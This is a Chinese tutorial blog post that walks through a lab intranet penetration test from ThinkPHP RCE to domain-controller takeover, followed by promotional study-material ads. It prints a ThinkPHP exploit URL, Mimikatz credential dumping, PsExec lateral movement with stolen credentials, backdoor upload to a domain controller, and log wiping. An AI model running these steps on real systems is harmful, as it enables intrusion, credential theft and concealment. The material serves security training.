完整链路内网渗透实战|小白可复现,外网突破直达内网横向
理论学习终需落地,实战案例是巩固内网渗透知识点的最佳方式。本文将分享一个小白可复现的内网渗透实战案例(基于合法靶场环境),覆盖“外网边界突破→内网信息收集→漏洞利用→权限提升→横向移动→域控突破”全流程,详细拆解每个步骤的操作细节、工具使用和问题解决方法,让你快速将理论知识转化为实战能力,同时避开实战中的常见坑。
案例环境:
攻击机:Kali Linux(IP:192.168.1.10)
靶场环境:模拟企业内网,包含3台主机,均处于同一网段(192.168.1.0/24):
1. 边界主机(Windows Server 2008,IP:192.168.1.15):对外开放Web服务(80端口),存在Web漏洞,作为外网突破入口;
2. 内网主机(Windows 7,IP:192.168.1.20):加入域环境,开放445端口(未打MS17-010补丁);
3. 域控制器(Windows Server 2012,IP:192.168.1.25):域名称为test.com,控制整个内网域环境。
案例目标:突破外网边界,获取域控制器权限,完成内网全面控制。
第一步:外网边界突破(打通内网入口)
1. 信息收集:使用Nmap扫描边界主机(192.168.1.15),执行“nmap -sV -p 80 192.168.1.15”,发现其开放80端口,Web服务为Apache 2.4.29,且采用ThinkPHP 5.0.20框架(该版本存在CVE-2018-20062远程代码执行漏洞)。
2. 漏洞验证:构造POC(漏洞验证代码)“http://192.168.1.15/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars(0)=phpinfo&vars(1)()=1”,若访问该URL后出现“URL拼写可能存在错误,请检查”的报错,需先排查2点:① 确认URL拼写是否正确,重点检查路径分隔符(“/”“\”)是否正确,避免因符号错误导致路径识别失败;② 确认靶机Web服务是否正常运行、80端口是否正常开放,可通过“nmap -sV -p 80 192.168.1.15”重新验证服务状态;排查无误后重新访问,若页面成功返回phpinfo信息,证明漏洞真实可利用。
3. 漏洞利用:使用MSF搜索ThinkPHP远程代码执行漏洞模块,配置目标IP和攻击机IP,执行利用命令,获取边界主机的meterpreter会话,执行“getuid”查看权限(普通用户权限)。
4. 提权至管理员:上传PrivescCheck.ps1工具,执行提权扫描,发现边界主机存在“系统内核提权漏洞”,利用MSF对应模块,提升至管理员权限(NT AUTHORITY\SYSTEM),并探查内网IP段(执行“ipconfig /all”,确认内网网段为192.168.1.0/24)。
第二步:内网信息收集(摸清内网地形)
1. 探测内网存活主机:在meterpreter会话中,执行“run post/multi/gather/arp_scan”,扫描内网存活主机,发现192.168.1.20(Windows 7)和192.168.1.25(Windows Server 2012)两台主机。
2. 扫描存活主机端口与服务:使用Nmap扫描192.168.1.20,执行“nmap -sV -p 445 192.168.1.20”,发现其开放445端口,且未打MS17-010补丁(永恒之蓝漏洞);扫描192.168.1.25,发现其开放53端口(DNS服务)、389端口(LDAP服务),判断为域控制器。
3. 域环境探测:执行“net config workstation”,确认内网存在域环境(域名称:test.com);执行“nltest /DCLIST:test.com”,确认域控制器IP为192.168.1.25。
4. 凭证窃取:使用Mimikatz工具,在meterpreter会话中执行“load mimikatz”,再执行“sekurlsa::logonpasswords”,抓取边界主机的用户哈希值和明文密码,获取域管理员账号(test\admin)和密码(Admin@123)。
第三步:内网横向移动(控制内网主机)
利用窃取的域管理员凭证,使用PsExec工具横向移动至192.168.1.20(Windows 7)主机:
执行命令“psexec.exe \192.168.1.20 -u test\admin -p Admin@123 cmd.exe”,成功获取该主机的cmd会话,实现横向移动,同时在该主机植入后门,维持权限。
第四步:域控突破(获取内网最高权限)
域控制器是内网的核心,控制域控制器即可控制整个域环境,利用域管理员凭证,通过SMB协议远程控制域控制器:
1. 在Kali Linux终端,执行“smbclient //192.168.1.25/c$ -U test\admin”,输入密码Admin@123,成功连接域控制器的C盘;
2. 上传后门文件:执行“put backdoor.exe”,将后门文件上传至域控制器的C盘;
3. 远程执行后门:使用PsExec工具,执行“psexec.exe \192.168.1.25 -u test\admin -p Admin@123 C:\backdoor.exe”,启动后门,获取域控制器的meterpreter会话;
4. 确认权限:执行“getuid”,显示“NT AUTHORITY\SYSTEM”,成功获取域控制器最高权限,完成内网全面控制。
第五步:痕迹清理与复盘
1. 痕迹清理:清理3台主机的命令历史、系统日志、工具文件和后门文件,确保不留下任何操作痕迹;
2. 案例复盘:本次案例的核心是“外网边界突破→凭证窃取→横向移动→域控突破”,关键在于信息收集的完整性和凭证的复用,小白可重点复现“ThinkPHP漏洞利用”和“永恒之蓝漏洞利用”两个环节,巩固工具使用和漏洞利用技巧。
小白注意:案例仅用于学习交流,实际渗透测试中,需严格遵循合法授权原则,同时根据实际环境调整操作步骤,灵活应对安全设备的拦截。下一篇我们将梳理内网渗透的常见坑,帮你避开新手易踩的误区。
学习资源
如果你也是零基础想转行网络安全,却苦于没系统学习路径、不懂核心攻防技能?光靠盲目摸索不仅浪费时间,还消磨自己信心。这份 360 智榜样学习中心独家出版《网络攻防知识库》专为转行党量身打造!
01内容涵盖
这份资料专门为零基础转行设计,19 大核心模块从 Linux系统、Python 基础、HTTP协议等地基知识到 Web 渗透、代码审计、CTF 实战层层递进,攻防结合的讲解方式让新手轻松上手,真实实战案例 + 落地脚本直接对标企业岗位需求,帮你快速搭建转行核心技能体系!
这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】
**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 ***(安全链接,放心点击)**
02 知识库价值
- 深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
- 广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
- 实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
03 谁需要掌握本知识库
- 负责企业整体安全策略与建设的CISO/安全总监
- 从事渗透测试、红队行动的安全研究员/渗透测试工程师
- 负责安全监控、威胁分析、应急响应的蓝队工程师/SOC分析师
- 设计开发安全产品、自动化工具的安全开发工程师
- 对网络攻防技术有浓厚兴趣的高校信息安全专业师生
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
**读者福利 |**【CSDN大礼包】最新网络安全/网安技术资料包~282G!无偿分享!!!**(安全链接,放心点击)**!
网络安全的知识多而杂,怎么科学合理安排?
下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!
初级网工
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
【“脚本小子”成长进阶资源领取】
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。
8、超级网工
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。
一些我自己买的、其他平台白嫖不到的视频教程:
需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。
网络安全学习路线&学习资源![]()
结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!
